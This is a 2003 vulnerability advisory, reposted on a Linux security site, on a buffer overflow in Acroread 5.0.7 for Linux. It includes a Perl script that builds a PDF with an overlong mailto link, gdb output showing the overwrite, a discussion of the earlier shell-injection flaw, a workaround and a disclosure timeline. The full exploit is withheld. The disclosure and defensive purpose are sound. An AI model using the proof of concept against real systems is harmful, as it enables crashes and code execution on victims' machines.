News Register Control Panel Private Messages Members List Team Search News Posts About Us
 

Acroread 5.0.7 buffer overflow
  Author: Anonymous
Added: 07/15/2003
Type: Advisory
Viewed: 1149 time(s)
Average visitor rating of 10/10Average visitor rating of 10/10Average visitor rating of 10/10Average visitor rating of 10/10Average visitor rating of 10/10Average visitor rating of 10/10Average visitor rating of 10/10Average visitor rating of 10/10Average visitor rating of 10/10Average visitor rating of 10/10
Acroread 5.0.7 buffer overflow

I. BACKGROUND

Acroread from http://www.adobe.com is the pre-eminent PDF
file viewer. The
latest version Acroread 5.0.7 for Linux was released on 17 June 2003.

II. DESCRIPTION

Despite recent security fixes, an exploitable buffer overflow with
long URL
strings remains. The overflow occurs when you click on the link, and
allows
execution of arbitrary code. Acroread versions 5.0.7 and 5.0.5 were
tested
on Debian (woody) Linux; other acroread 5.* versions on other UNIX
platforms are expected also to be vulnerable. (Configure Netscape as
your
browser, and do not have Netscape running at the time you click.)

III. ANALYSIS

Produce a suitable test file using pdflatex e.g. with:

#!/usr/bin/perl --
#
# Demo for acroread 5.0.7 on Debian Linux
#
print '
Writing TeX file ...
';
# For acroread 5.0.5 use 248 Bs instead of 504
open P, '>attack.tex';
print P '
\documentclass[11pt]{letter}
\usepackage{times}
\usepackage[pdfpagemode=none,pdfstartview=FitH]{hyperref}
\begin{document}
   \href{mailto:X',("B"x504).("A"x4),'}
   {\texttt{mailto:X("B"x504).("A"x4)}}
\end{document}
';
close P;
#
print '
Running pdflatex ...
';
system 'pdflatex attack';
#
#!#

Acroread has a signal handler and may not crash when the link is
clicked,
but gdb shows:

(gdb) run attack.pdf
Starting program: /Acroread507/Reader/intellinux/bin/acroread
attack.pdf
Program received signal SIGSEGV, Segmentation fault.
(gdb) where
#0  0x40f50513 in mdNetscapeFront ()
   from /Acroread507/Reader/intellinux/plug_ins/wwwlink.api
Cannot access memory at address 0x41414141

IV. WORKAROUND

Remove the file .../Reader/*/plug_ins/wwwlink.api .

V. EXPLOIT

Censored. Fully working exploit sent to CERT.

VI. COMMENTS

Acroread 5.0.7 for Linux was released on 17 June 2003, and the README
file
contains:
   New for Acrobat Reader 5.0.7
   A security patch was applied that solves the problem reported in
   CERT vulnerability 200132 whereby a weblink could execute shell 
   commands.
Acroread still uses 'sh -c' via system(3) but disallows embedded
single
quotes and replaces dollar($) and backquote(`) by %24 and %60 in the
URL,
then quotes the URL with single quotes like
  sh -c DISPLAY=DISPL BROWSER 'URL'
Seems that when given the example exploit, in a knee-jerk reaction
Adobe
encoded the "special" characters used. When told that the
"shell
meta-character soup" was larger, they quoted the URL and, seeing
how
encoding did not work, courageously banned embedded quotes; were too
lazy
to remove the encoding. Should have replaced system(3) with
fork/setenv/execv instead.
The lengthening of the URL string prompted me to check how acroread
handles
long replacements; but even "plain" long strings cause it
to fail.

The 5.0.7 README file also contains:
   New for Acrobat Reader 5.0.6
   A security patch was applied that solves the problem reported in
   http://online.securityfocus.com/archive/1/278984
 where opening
   the font cache when the application starts up can unintentionally 
   cause the permissions of other files to change.
and confirm that this is solved in 5.0.7.

The changes from 5.0.5 to 5.0.7 are in libCoolType.so, EScript.api and
wwwlink.api only, so acroread 5.0.7 still announces itself, on the
splash
screen and in Help AboutAcrobatReader, as 5.0.5. CoolType was for
5.0.6,
wwwlink for 5.0.7; is EScript for http://www.kb.cert.org/vuls/id/184820
though that was meant to affect "full" acrobat only?

Acroread versions 4.* do not seem vulnerable to the buffer overflow,
they
chop the URL string after 1025 (!!??) bytes; but are vulnerable to the
"shell meta-character soup" (could be protected with the
workaround below).

VII. TIMELINE

13 Jun 2003  -10day advisory released
17 Jun 2003  Acroread 5.0.7 for Linux released
23 Jun 2003  iDefense and CERT alerted to buffer overflow
26 Jun 2003  Fully working exploit sent to iDefense
 1 Jul 2003  [email protected]
 finds same vulnerability
 9 Jul 2003  iDefense does not offer payment

VIII. REFERENCES

CERT vulnerability note
  http://www.kb.cert.org/vuls/id/200132

-10Day CERT Advisory on PDF Files (note that the workaround in the
latter
message does not protect against the buffer overflow)
  http://lists.netsys.com/pipermail/full-disclosure/2003-June/010397.html

  http://lists.netsys.com/pipermail/full-disclosure/2003-June/010417.html


Adobe Acrobat Reader <=5.0.7 Buffer Overflow Vulnerability + PoC
code
(public report of the same vulnerability)
  http://www.securityfocus.com/archive/1/327335
  http://www.securityfocus.com/archive/1/328472

IX. AUTHOR

Paul Szabo - [email protected]
  http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics  University of Sydney   2006 
Australia

Article Pages:  1  




How would you rate this article:    Bad Good   Go � 


� Copyright Linux Advisory 2003. All rights reserved.
We are not responsible for the comment and story contributed by users.